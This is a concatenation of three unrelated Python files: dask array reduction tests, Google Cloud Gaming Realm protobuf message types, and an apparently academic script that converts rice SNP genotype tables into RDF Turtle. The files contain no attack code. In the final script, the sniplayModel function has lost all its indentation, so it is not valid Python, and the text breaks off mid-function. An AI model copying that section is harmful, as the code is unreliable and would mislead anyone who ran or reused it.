        assert_eq(da_func(darr, axis=1, keepdims=True, split_every=2),
                  np_func(narr, axis=1, keepdims=True))
@pytest.mark.parametrize('dtype', ['f4', 'i4'])
def test_reductions_2D(dtype):
    """Run the 2-d reduction battery over every supported reduction."""
    narr = np.arange(1, 122).reshape((11, 11)).astype(dtype)
    darr = da.from_array(narr, chunks=(4, 4))
    # A full keepdims reduction collapses the graph to a single key.
    res = darr.sum(keepdims=True)
    assert res._keys() == [[(res.name, 0, 0)]]
    cases = [
        (da.sum, np.sum, True),
        (da.prod, np.prod, True),
        (da.mean, np.mean, True),
        (da.var, np.var, False),      # Difference in dtype algo
        (da.std, np.std, False),      # Difference in dtype algo
        (da.min, np.min, False),
        (da.max, np.max, False),
        (da.any, np.any, False),
        (da.all, np.all, False),
        (da.nansum, np.nansum, True),
        (da.nanprod, nanprod, True),
        (da.nanmean, np.mean, True),
        (da.nanvar, np.nanvar, False),   # Difference in dtype algo
        (da.nanstd, np.nanstd, False),   # Difference in dtype algo
        (da.nanmin, np.nanmin, False),
        (da.nanmax, np.nanmax, False),
    ]
    for da_func, np_func, with_dtype in cases:
        reduction_2d_test(da_func, darr, np_func, narr, with_dtype)
@pytest.mark.parametrize(['dfunc', 'func'],
                         [(da.argmin, np.argmin), (da.argmax, np.argmax),
                          (da.nanargmin, np.nanargmin),
                          (da.nanargmax, np.nanargmax)])
def test_arg_reductions(dfunc, func):
    """Arg-reductions must match numpy on every axis, with and without a
    global split_every, and must reject invalid axes."""
    narr = np.random.random((10, 10, 10))
    darr = da.from_array(narr, chunks=(3, 4, 5))
    assert_eq(dfunc(darr), func(narr))
    for axis in (0, 1, 2):
        assert_eq(dfunc(darr, axis), func(narr, axis))
    with set_options(split_every=2):
        assert_eq(dfunc(darr), func(narr))
        for axis in (0, 1, 2):
            assert_eq(dfunc(darr, axis), func(narr, axis))
    # Out-of-range and tuple axes are rejected eagerly.
    pytest.raises(ValueError, lambda: dfunc(darr, 3))
    pytest.raises(TypeError, lambda: dfunc(darr, (0, 1)))
    narr1 = np.arange(10)
    darr1 = da.from_array(narr1, chunks=3)
    assert_eq(dfunc(darr1), func(narr1))
    assert_eq(dfunc(darr1, 0), func(narr1, 0))
    assert_eq(dfunc(darr1, 0, split_every=2), func(narr1, 0))
@pytest.mark.parametrize(['dfunc', 'func'],
                         [(da.nanargmin, np.nanargmin),
                          (da.nanargmax, np.nanargmax)])
def test_nanarg_reductions(dfunc, func):
    """nanarg reductions must agree with numpy where defined and raise
    ValueError on all-NaN slices."""
    narr = np.random.random((10, 10, 10))
    narr[5] = np.nan
    darr = da.from_array(narr, chunks=(3, 4, 5))
    assert_eq(dfunc(darr), func(narr))
    assert_eq(dfunc(darr, 0), func(narr, 0))
    # Axes 1 and 2 slice through the all-NaN plane -> must raise at compute.
    for axis in (1, 2):
        with pytest.raises(ValueError):
            dfunc(darr, axis).compute()
    narr[:] = np.nan
    darr = da.from_array(narr, chunks=(3, 4, 5))
    with pytest.raises(ValueError):
        dfunc(darr).compute()
def test_reductions_2D_nans():
    """Reductions over a chunked array whose chunks hold some, all, or no NaNs."""
    # chunks are a mix of some/all/no NaNs
    narr = np.full((4, 4), np.nan)
    narr[:2, :2] = np.array([[1, 2], [3, 4]])
    narr[2, 2] = 5
    narr[3, 3] = 6
    darr = da.from_array(narr, chunks=(2, 2))
    pairs = [
        (da.sum, np.sum), (da.prod, np.prod), (da.mean, np.mean),
        (da.var, np.var), (da.std, np.std), (da.min, np.min),
        (da.max, np.max), (da.any, np.any), (da.all, np.all),
        (da.nansum, np.nansum), (da.nanprod, nanprod),
        (da.nanmean, np.nanmean), (da.nanvar, np.nanvar),
        (da.nanstd, np.nanstd), (da.nanmin, np.nanmin),
        (da.nanmax, np.nanmax),
    ]
    for da_func, np_func in pairs:
        reduction_2d_test(da_func, darr, np_func, narr, False, False)
    arg_pairs = [(da.argmax, np.argmax), (da.argmin, np.argmin),
                 (da.nanargmax, np.nanargmax), (da.nanargmin, np.nanargmin)]
    # Full-array arg reductions, then each axis in turn.
    for da_func, np_func in arg_pairs:
        assert_eq(da_func(darr), np_func(narr))
    for axis in (0, 1):
        for da_func, np_func in arg_pairs:
            assert_eq(da_func(darr, axis=axis), np_func(narr, axis=axis))
def test_moment():
    """Central moments (2nd-4th order) against a direct numpy reference,
    including a poorly conditioned input and tree reductions."""
    def moment(x, n, axis=None):
        # Reference implementation: E[(x - mean)^n], with the element count
        # computed via ones_like so axis handling matches x exactly.
        return (((x - x.mean(axis=axis, keepdims=True)) ** n).sum(axis=axis) /
                np.ones_like(x).sum(axis=axis))
    # Poorly conditioned
    x = np.array([1., 2., 3.] * 10).reshape((3, 10)) + 1e8
    a = da.from_array(x, chunks=5)
    assert_eq(a.moment(2), moment(x, 2))
    assert_eq(a.moment(3), moment(x, 3))
    assert_eq(a.moment(4), moment(x, 4))
    x = np.arange(1, 122).reshape((11, 11)).astype('f8')
    a = da.from_array(x, chunks=(4, 4))
    assert_eq(a.moment(4, axis=1), moment(x, 4, axis=1))
    assert_eq(a.moment(4, axis=(1, 0)), moment(x, 4, axis=(1, 0)))
    # Tree reduction
    assert_eq(a.moment(order=4, split_every=4), moment(x, 4))
    assert_eq(a.moment(order=4, axis=0, split_every=4), moment(x, 4, axis=0))
    assert_eq(a.moment(order=4, axis=1, split_every=4), moment(x, 4, axis=1))
def test_reductions_with_negative_axes():
    """Negative axis values must behave like their positive equivalents."""
    narr = np.random.random((4, 4, 4))
    darr = da.from_array(narr, chunks=2)
    assert_eq(darr.argmin(axis=-1), narr.argmin(axis=-1))
    assert_eq(darr.argmin(axis=-1, split_every=2), narr.argmin(axis=-1))
    assert_eq(darr.sum(axis=-1), narr.sum(axis=-1))
    assert_eq(darr.sum(axis=(0, -1)), narr.sum(axis=(0, -1)))
def test_nan():
    """NaN-aware reductions on an array containing NaNs match numpy."""
    ref = np.array([[1, np.nan, 3, 4],
                    [5, 6, 7, np.nan],
                    [9, 10, 11, 12]])
    darr = da.from_array(ref, chunks=(2, 2))
    assert_eq(np.nansum(ref), da.nansum(darr))
    assert_eq(np.nansum(ref, axis=0), da.nansum(darr, axis=0))
    assert_eq(np.nanmean(ref, axis=1), da.nanmean(darr, axis=1))
    assert_eq(np.nanmin(ref, axis=1), da.nanmin(darr, axis=1))
    assert_eq(np.nanmax(ref, axis=(0, 1)), da.nanmax(darr, axis=(0, 1)))
    assert_eq(np.nanvar(ref), da.nanvar(darr))
    assert_eq(np.nanstd(ref, axis=0), da.nanstd(darr, axis=0))
    assert_eq(np.nanargmin(ref, axis=0), da.nanargmin(darr, axis=0))
    assert_eq(np.nanargmax(ref, axis=0), da.nanargmax(darr, axis=0))
    assert_eq(nanprod(ref), da.nanprod(darr))
def test_0d_array():
    """Reducing to a scalar must give the same scalar type as numpy."""
    mean_da = da.mean(da.ones(4, chunks=4), axis=0).compute()
    mean_np = np.mean(np.ones(4))
    assert type(mean_da) == type(mean_np)
    sum_da = da.sum(da.zeros(4, chunks=1)).compute()
    sum_np = np.sum(np.zeros(4))
    assert type(sum_da) == type(sum_np)
def test_reduction_on_scalar():
    """Reductions must also work on zero-dimensional dask arrays."""
    scalar = da.from_array(np.array(1.0), chunks=())
    assert (scalar == scalar).all()
def assert_max_deps(x, n, eq=True):
    """Assert on the widest fan-in of any task in ``x``'s graph.

    With ``eq=True`` the maximum dependency count must equal ``n``;
    otherwise it must not exceed ``n``.
    """
    dependencies, dependents = get_deps(x.dask)
    widest = max(map(len, dependencies.values()))
    assert widest == n if eq else widest <= n
def test_tree_reduce_depth():
    """Tree reductions must respect split_every fan-in limits exactly.

    For per-axis dict limits the widest task's fan-in is the product of the
    per-axis limits over the reduced axes; for an int limit it is bounded by
    (or, when chunk counts are small, exactly) that limit.
    """
    # 2D
    x = da.from_array(np.arange(242).reshape((11, 22)), chunks=(3, 4))
    thresh = {0: 2, 1: 3}
    assert_max_deps(x.sum(split_every=thresh), 2 * 3)
    assert_max_deps(x.sum(axis=0, split_every=thresh), 2)
    assert_max_deps(x.sum(axis=1, split_every=thresh), 3)
    # 11x22 with (3,4) chunks -> 4x6 chunk grid: a 20-way limit is a cap
    # for the full reduction, but exact per axis (4 and 6 chunks).
    assert_max_deps(x.sum(split_every=20), 20, False)
    assert_max_deps(x.sum(axis=0, split_every=20), 4)
    assert_max_deps(x.sum(axis=1, split_every=20), 6)
    # 3D
    x = da.from_array(np.arange(11 * 22 * 29).reshape((11, 22, 29)), chunks=(3, 4, 5))
    thresh = {0: 2, 1: 3, 2: 4}
    assert_max_deps(x.sum(split_every=thresh), 2 * 3 * 4)
    assert_max_deps(x.sum(axis=0, split_every=thresh), 2)
    assert_max_deps(x.sum(axis=1, split_every=thresh), 3)
    assert_max_deps(x.sum(axis=2, split_every=thresh), 4)
    assert_max_deps(x.sum(axis=(0, 1), split_every=thresh), 2 * 3)
    assert_max_deps(x.sum(axis=(0, 2), split_every=thresh), 2 * 4)
    assert_max_deps(x.sum(axis=(1, 2), split_every=thresh), 3 * 4)
    assert_max_deps(x.sum(split_every=20), 20, False)
    assert_max_deps(x.sum(axis=0, split_every=20), 4)
    assert_max_deps(x.sum(axis=1, split_every=20), 6)
    assert_max_deps(x.sum(axis=2, split_every=20), 6)
    assert_max_deps(x.sum(axis=(0, 1), split_every=20), 20, False)
    assert_max_deps(x.sum(axis=(0, 2), split_every=20), 20, False)
    assert_max_deps(x.sum(axis=(1, 2), split_every=20), 20, False)
    # 40 exceeds the chunk-count products, so fan-in equals those products.
    assert_max_deps(x.sum(axis=(0, 1), split_every=40), 4 * 6)
    assert_max_deps(x.sum(axis=(0, 2), split_every=40), 4 * 6)
    assert_max_deps(x.sum(axis=(1, 2), split_every=40), 6 * 6)
def test_tree_reduce_set_options():
    """set_options(split_every=...) controls tree-reduction fan-in globally."""
    arr = da.from_array(np.arange(242).reshape((11, 22)), chunks=(3, 4))
    with set_options(split_every={0: 2, 1: 3}):
        assert_max_deps(arr.sum(), 2 * 3)
        assert_max_deps(arr.sum(axis=0), 2)
def test_reduction_names():
    """Reduction outputs must carry recognisable graph-key name prefixes."""
    arr = da.ones(5, chunks=(2,))
    assert arr.sum().name.startswith('sum')
    assert 'max' in arr.max().name.split('-')[0]
    assert arr.var().name.startswith('var')
    assert arr.all().name.startswith('all')
    assert any(k[0].startswith('nansum') for k in da.nansum(arr).dask)
    assert arr.mean().name.startswith('mean')
| |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
from google.cloud.gaming_v1.types import common
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
# Registry of every message type defined in this module; proto-plus uses the
# manifest to bind the classes below to the google.cloud.gaming.v1 package.
__protobuf__ = proto.module(
    package="google.cloud.gaming.v1",
    manifest={
        "ListRealmsRequest",
        "ListRealmsResponse",
        "GetRealmRequest",
        "CreateRealmRequest",
        "DeleteRealmRequest",
        "UpdateRealmRequest",
        "PreviewRealmUpdateRequest",
        "PreviewRealmUpdateResponse",
        "Realm",
    },
)
class ListRealmsRequest(proto.Message):
    r"""Request message for RealmsService.ListRealms.
    Attributes:
        parent (str):
            Required. The parent resource name, in the following form:
            ``projects/{project}/locations/{location}``.
        page_size (int):
            Optional. The maximum number of items to return. If
            unspecified, server will pick an appropriate default. Server
            may return fewer items than requested. A caller should only
            rely on response's
            [next_page_token][google.cloud.gaming.v1.ListRealmsResponse.next_page_token]
            to determine if there are more realms left to be queried.
        page_token (str):
            Optional. The next_page_token value returned from a previous
            List request, if any.
        filter (str):
            Optional. The filter to apply to list
            results.
        order_by (str):
            Optional. Specifies the ordering of results following syntax
            at
            https://cloud.google.com/apis/design/design_patterns#sorting_order.
    """
    # Field numbers map to the protobuf wire format; never renumber them.
    parent = proto.Field(proto.STRING, number=1,)
    page_size = proto.Field(proto.INT32, number=2,)
    page_token = proto.Field(proto.STRING, number=3,)
    filter = proto.Field(proto.STRING, number=4,)
    order_by = proto.Field(proto.STRING, number=5,)
class ListRealmsResponse(proto.Message):
    r"""Response message for RealmsService.ListRealms.
    Attributes:
        realms (Sequence[google.cloud.gaming_v1.types.Realm]):
            The list of realms.
        next_page_token (str):
            Token to retrieve the next page of results,
            or empty if there are no more results in the
            list.
        unreachable (Sequence[str]):
            List of locations that could not be reached.
    """
    @property
    def raw_page(self):
        # Pager support hook: the paginated iterator expects the raw
        # response object here.
        return self
    # Field numbers map to the protobuf wire format; never renumber them.
    realms = proto.RepeatedField(proto.MESSAGE, number=1, message="Realm",)
    next_page_token = proto.Field(proto.STRING, number=2,)
    unreachable = proto.RepeatedField(proto.STRING, number=3,)
class GetRealmRequest(proto.Message):
    r"""Request message for RealmsService.GetRealm.
    Attributes:
        name (str):
            Required. The name of the realm to retrieve, in the
            following form:
            ``projects/{project}/locations/{location}/realms/{realm}``.
    """
    # Field numbers map to the protobuf wire format; never renumber them.
    name = proto.Field(proto.STRING, number=1,)
class CreateRealmRequest(proto.Message):
    r"""Request message for RealmsService.CreateRealm.
    Attributes:
        parent (str):
            Required. The parent resource name, in the following form:
            ``projects/{project}/locations/{location}``.
        realm_id (str):
            Required. The ID of the realm resource to be
            created.
        realm (google.cloud.gaming_v1.types.Realm):
            Required. The realm resource to be created.
    """
    # Field numbers map to the protobuf wire format; never renumber them.
    parent = proto.Field(proto.STRING, number=1,)
    realm_id = proto.Field(proto.STRING, number=2,)
    realm = proto.Field(proto.MESSAGE, number=3, message="Realm",)
class DeleteRealmRequest(proto.Message):
    r"""Request message for RealmsService.DeleteRealm.
    Attributes:
        name (str):
            Required. The name of the realm to delete, in the following
            form:
            ``projects/{project}/locations/{location}/realms/{realm}``.
    """
    # Field numbers map to the protobuf wire format; never renumber them.
    name = proto.Field(proto.STRING, number=1,)
class UpdateRealmRequest(proto.Message):
    r"""Request message for RealmsService.UpdateRealm.
    Attributes:
        realm (google.cloud.gaming_v1.types.Realm):
            Required. The realm to be updated. Only fields specified in
            update_mask are updated.
        update_mask (google.protobuf.field_mask_pb2.FieldMask):
            Required. The update mask applies to the resource. For the
            ``FieldMask`` definition, see
            https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask
    """
    # Field numbers map to the protobuf wire format; never renumber them.
    realm = proto.Field(proto.MESSAGE, number=1, message="Realm",)
    update_mask = proto.Field(
        proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,
    )
class PreviewRealmUpdateRequest(proto.Message):
    r"""Request message for RealmsService.PreviewRealmUpdate.
    Attributes:
        realm (google.cloud.gaming_v1.types.Realm):
            Required. The realm to be updated. Only fields specified in
            update_mask are updated.
        update_mask (google.protobuf.field_mask_pb2.FieldMask):
            Required. The update mask applies to the resource. For the
            ``FieldMask`` definition, see
            https://developers.google.com/protocol-buffers/docs/reference/google.protobuf#fieldmask
        preview_time (google.protobuf.timestamp_pb2.Timestamp):
            Optional. The target timestamp to compute the
            preview.
    """
    # Field numbers map to the protobuf wire format; never renumber them.
    realm = proto.Field(proto.MESSAGE, number=1, message="Realm",)
    update_mask = proto.Field(
        proto.MESSAGE, number=2, message=field_mask_pb2.FieldMask,
    )
    preview_time = proto.Field(
        proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,
    )
class PreviewRealmUpdateResponse(proto.Message):
    r"""Response message for RealmsService.PreviewRealmUpdate.
    Attributes:
        etag (str):
            ETag of the realm.
        target_state (google.cloud.gaming_v1.types.TargetState):
            The target state.
    """
    # Field numbers map to the protobuf wire format (note: numbering
    # starts at 2 in the service definition); never renumber them.
    etag = proto.Field(proto.STRING, number=2,)
    target_state = proto.Field(proto.MESSAGE, number=3, message=common.TargetState,)
class Realm(proto.Message):
    r"""A realm resource.
    Attributes:
        name (str):
            The resource name of the realm, in the following form:
            ``projects/{project}/locations/{location}/realms/{realm}``.
            For example,
            ``projects/my-project/locations/{location}/realms/my-realm``.
        create_time (google.protobuf.timestamp_pb2.Timestamp):
            Output only. The creation time.
        update_time (google.protobuf.timestamp_pb2.Timestamp):
            Output only. The last-modified time.
        labels (Sequence[google.cloud.gaming_v1.types.Realm.LabelsEntry]):
            The labels associated with this realm. Each
            label is a key-value pair.
        time_zone (str):
            Required. Time zone where all policies
            targeting this realm are evaluated. The value of
            this field must be from the IANA time zone
            database: https://www.iana.org/time-zones.
        etag (str):
            ETag of the resource.
        description (str):
            Human readable description of the realm.
    """
    # Field numbers map to the protobuf wire format; the gap at 5 is
    # reserved in the service definition. Never renumber these.
    name = proto.Field(proto.STRING, number=1,)
    create_time = proto.Field(proto.MESSAGE, number=2, message=timestamp_pb2.Timestamp,)
    update_time = proto.Field(proto.MESSAGE, number=3, message=timestamp_pb2.Timestamp,)
    labels = proto.MapField(proto.STRING, proto.STRING, number=4,)
    time_zone = proto.Field(proto.STRING, number=6,)
    etag = proto.Field(proto.STRING, number=7,)
    description = proto.Field(proto.STRING, number=8,)
__all__ = tuple(sorted(__protobuf__.manifest))
| |
from __future__ import with_statement
import pprint
from globalVars import *
import re
import os
import time
__author__ = 'elhassouni'
# Global variables ###################################################################################################
# Input and output file paths.
path = '/media/elhassouni/donnees/Noeud-plante-projet/workspace/AgroLD/AgroLD_ETL/test_files/sniplay_db/sniplay_test.txt'
path_output = '/media/elhassouni/donnees/Noeud-plante-projet/workspace/AgroLD/AgroLD_ETL/rdf_ttl/sniplay_db_ttl/sniplay.ttl' # The Turtle output file
# NOTE(review): this handle is opened at import time and never closed; the
# script relies on process exit to flush it.
output = open(path_output, "w")
pp = pprint.PrettyPrinter(indent=4)
# Global list definitions (track entities already written to the output).
alleles_liste_AA = list()
gene_list = list()
chromosome_list = list()
individu_list=list()
alleleliste = []
listeIndividu = list()
identifiantAlleliste = list ()
#identifiantAlleliste = list ()
# Build the list of column keys from the input file's header line.
# NOTE(review): this handle is also left open; see SaveHeader for the same logic.
realine = open(path, 'r')
header = realine.readline()
header = re.sub('"', '', header)
header = re.sub(';;', ' ', header)
headerListe = header.split()
#print(headerListe)
dictionnaireAllele = {}
print(headerListe)
# Drop the fixed columns so only per-individual columns remain.
headerListe.remove("rs#")
headerListe.remove("alleles")
headerListe.remove("chrom")
headerListe.remove("pos")
headerListe.remove("gene")
print(headerListe)
# One empty allele list per individual column.
for item in headerListe:
    dictionnaireAllele[item] = []
# Counters.
number_allele = 1
count = 0
allele_incre = 0
# Global variables ###################################################################################################
# Helper: return the keys of dict d whose value equals val (used to find the
# individuals carrying a given genotype, e.g. 'AA' or 'GG').
cherchecle = lambda d, val: [c for c,v in d.items() if v==val]
def SaveHeader():
    """Return the list of column names from the input file's first line.

    Strips double quotes and collapses ';;' to a space before splitting on
    whitespace, mirroring the header preprocessing done at module load.

    Fix: the file is now opened via a context manager — the original leaked
    an open file handle on every call (and this is called once per data line).
    """
    with open(path, 'r') as reader:
        header = reader.readline()
    header = re.sub('"', '', header)
    header = re.sub(';;', ' ', header)
    return header.split()
#Methode qui prend en parametre le fichier
#retourne la liste des donne
def ParseLine(file):
    """Split one tab-separated data line and zip it with the header columns.

    :param file: one raw line of the input file
    :return: a single-element list containing the {column: value} dict

    Fix: removed the dead assignments ``lineFile = list`` (which bound the
    ``list`` type itself, never used) and ``headers = list()`` (immediately
    overwritten) from the original.
    """
    fields = file.split('\t')
    headers = SaveHeader()
    return [dict(zip(headers, fields))]
#Methode non necessaire
def buildeDicoVariant(listeIndividu):
    """Wrap the given individuals in a ``{'AA': [...]}`` dictionary.

    (Marked "not necessary" by the original author; kept for compatibility.)
    """
    return {'AA': [individual for individual in listeIndividu]}
#Methode pour afficher l'ensemeble des donne d'un dictionnaire
#utiliser que si necessaire
def AfficheData(data):
    """Debug helper: print every value stored under every key of *data*."""
    for values in data.values():
        for value in values:
            print(value)
#Methode trouver les individu avec le variant AA avec en entre le fichier.
#appel de la methode ParseIndividu pour recuper a chaque ligne les donnees
def FoundVariantGG(file_in):
    """Return the header columns (individuals) whose genotype on this line is 'GG'.

    :param file_in: one raw line of the input file
    :return: list of matching column names (empty if none)

    Fix: the result is initialised before the loop so an empty parse can no
    longer leave the return variable unbound (the original relied on
    ParseLine always yielding exactly one record).
    """
    matches = []
    for record in ParseLine(file_in):
        matches = cherchecle(record, 'GG')
    return matches
#Methode trouver les individu avec le variant AA avec en entre le fichier.
#appel de la methode ParseIndividu pour recuper a chaque ligne les donnees
def FoundVariantAA(file_in):
    """Return the header columns (individuals) whose genotype on this line is 'AA'.

    :param file_in: one raw line of the input file
    :return: list of matching column names (empty if none)

    Fix: initialises the result before the loop (the original could leave it
    unbound on an empty parse) and renames the copy-pasted, misleading
    ``listeGG`` local.
    """
    matches = []
    for record in ParseLine(file_in):
        matches = cherchecle(record, 'AA')
    return matches
def FoundVariantTT(file_in):
    """Return the header columns (individuals) whose genotype on this line is 'TT'.

    :param file_in: one raw line of the input file
    :return: list of matching column names (empty if none)

    Fix: the result is initialised before the loop so an empty parse cannot
    leave the return variable unbound; kept consistent with the other
    FoundVariant* helpers.
    """
    matches = []
    for record in ParseLine(file_in):
        matches = cherchecle(record, 'TT')
    return matches
def FoundVariantCC(file_in):
    """Return the header columns (individuals) whose genotype on this line is 'CC'.

    :param file_in: one raw line of the input file
    :return: list of matching column names (empty if none)

    Fix: the result is initialised before the loop so an empty parse cannot
    leave the return variable unbound; kept consistent with the other
    FoundVariant* helpers.
    """
    matches = []
    for record in ParseLine(file_in):
        matches = cherchecle(record, 'CC')
    return matches
def increment():
    """Advance the module-level allele counter by one."""
    global allele_incre
    allele_incre += 1
def ParseHapMap():
    """Stream the HapMap-style input file and feed each row to sniplayModel.

    Each data line is normalised into a dict: the eleven fixed columns are
    mapped by name ('.' becomes None), and the per-genotype individual lists
    (AA/TT/CC/GG) are computed from the raw line.

    Fixes: the file is now closed via a context manager (the original handle
    was never closed) and the dead ``map_ds`` accumulator was removed.
    """
    fixed_columns = ("rs#", "alleles", "chrom", "pos", "gene", "feature",
                     "effect", "codon_change", "amino_acid_change", "MAF",
                     "missing_data")
    with open(path, "r") as map_reader:
        for line in map_reader:
            if line.startswith("rs#"):
                continue  # skip the header line
            # NOTE(review): rows shorter than 11 columns raise IndexError,
            # as in the original — confirm input is always complete.
            parts = line.strip().split("\t")
            record = {name: (None if parts[i] == "." else parts[i])
                      for i, name in enumerate(fixed_columns)}
            record["AA"] = FoundVariantAA(line)
            record["TT"] = FoundVariantTT(line)
            record["CC"] = FoundVariantCC(line)
            record["GG"] = FoundVariantGG(line)
            sniplayModel(record)
def writeStudy():
    """Emit the RDF/Turtle description of the GBS study and link every individual.

    Writes to the module-level ``output`` handle and echoes the buffer to
    stdout.

    Fix: ``dict.iteritems()`` does not exist on Python 3; ``.items()`` is
    equivalent here and works on both Python 2 and 3.
    """
    sniplay_buffer = ''
    sniplay_buffer += study_ns + "GBS_Courtois_et_al_2013" "\n"
    for key, value in dictionnaireAllele.items():
        sniplay_buffer += "\t" + base_vocab_ns + "is_about" + "\t" + sniplay_individual_ns + key + " ;\n"
    sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
    sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "OBI_0000073" + " . \n"
    output.write(sniplay_buffer)
    print(sniplay_buffer)
# Write sniplay
def sniplayModel(sniplay_ds):
sniplay_buffer = ''
if not sniplay_ds['chrom'] in chromosome_list:
sniplay_buffer = ''
chromosome_list.append(sniplay_ds['chrom'])
chromosome = int(str(re.sub('Chr', '', sniplay_ds['chrom'])))
if chromosome < 10:
sniplay_buffer += chromosome_ns + "0" + str(chromosome) + "\n"
else:sniplay_buffer += chromosome_ns + str(chromosome) + "\n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "SO_0000430" + " . \n"
print(sniplay_buffer)
output.write(sniplay_buffer)
if not sniplay_ds['gene'] in gene_list:
if sniplay_ds['gene'] == "intergenic:":
intergenic = sniplay_ds['chrom'] +"_" + sniplay_ds['pos'] + "_intergenic"
if not intergenic in gene_list:
gene_list.append(intergenic)
sniplay_buffer = ''
sniplay_buffer += sniplay_gene_integenic_ns + sniplay_ds['chrom'] +"_" + sniplay_ds['pos'] + "_intergenic" + " \n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "SO_0000704" + " ;\n"
if sniplay_ds['feature'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_feature" + "\t" + sniplay_ds['feature'] + " ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_start_position" + "\t" + " \"" + sniplay_ds['pos'] + "\" ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_missing_data" + "\t" + " \"" + str(float(re.sub('%', '',sniplay_ds['missing_data']))/100) + "\"^^xsd:float ;\n"
if sniplay_ds['amino_acid_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_amino_acid_change" + "\t" + " \"" + sniplay_ds['amino_acid_change'] + "\" ;\n"
if sniplay_ds['effect'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_effect" + "\t" + " \"" + sniplay_ds['effect'] + "\" ;\n"
if sniplay_ds['codon_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_codon_change" + "\t" + " \"" + sniplay_ds['codon_change'] + "\";\n"
if sniplay_ds['AA']:
for indiv in sniplay_ds['AA']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['CC']:
for indiv in sniplay_ds['CC']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['TT']:
for indiv in sniplay_ds['TT']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['GG']:
for indiv in sniplay_ds['GG']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
else:
sniplay_buffer = ''
gene_list.append(sniplay_ds['gene'])
sniplay_buffer += sniplay_gene_ns + re.sub(':', '', sniplay_ds['gene']) + " \n"
sniplay_buffer += "\t" + rdf_ns + "type" + "\t" + owl_ns + "Class" + " ;\n"
sniplay_buffer += "\t" + rdfs_ns + "subClassOf" + "\t\t" + obo_ns + "SO_0000704" + " ;\n"
if sniplay_ds['feature'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_feature" + "\t" + " \"" +sniplay_ds['feature'] + "\" ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_start_position" + "\t" + " \"" + sniplay_ds['pos'] + "\" ;\n"
sniplay_buffer += "\t" + base_vocab_ns + "has_missing_data" + "\t" + " \"" + str(float(re.sub('%', '',sniplay_ds['missing_data']))/100) + "\"^^xsd:float ;\n"
if sniplay_ds['amino_acid_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_amino_acid_change" + "\t" + " \"" + sniplay_ds['amino_acid_change'] + "\";\n"
if sniplay_ds['effect'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_effect" + "\t" + " \"" + sniplay_ds['effect'] + "\" ;\n"
if sniplay_ds['codon_change'] != "#":
sniplay_buffer += "\t" + base_vocab_ns + "has_codon_change" + "\t" + " \"" + sniplay_ds['codon_change'] + "\" ;\n"
if sniplay_ds['AA']:
for indiv in sniplay_ds['AA']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
if sniplay_ds['CC']:
for indiv in sniplay_ds['CC']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['TT']:
for indiv in sniplay_ds['TT']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
if sniplay_ds['GG']:
for indiv in sniplay_ds['GG']:
sniplay_buffer += "\t" + base_vocab_ns + "part_of" + "\t""\t" + sniplay_individual_ns + indiv + ";\n"
#if not indiv in listeIndividu:
# writeIndividu(indiv,sniplay_ds)
for indiv in sniplay_ds['AA']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_AA_" + str(allele_incre) + " ;\n"
identifiant = sniplay_ds['pos'] + "_" + indiv + "_AA_" + str(allele_incre) + "_MAF_" + sniplay_ds['MAF']
dictionnaireAllele[indiv].append(str(identifiant))
for indiv in sniplay_ds['CC']:
sniplay_buffer += "\t" + base_vocab_ns + "has_allele" + "\t""\t" + sniplay_allele_ns + sniplay_ds['pos'] + "_" + indiv + "_CC_" + str(allele_incre) + " ;\n"
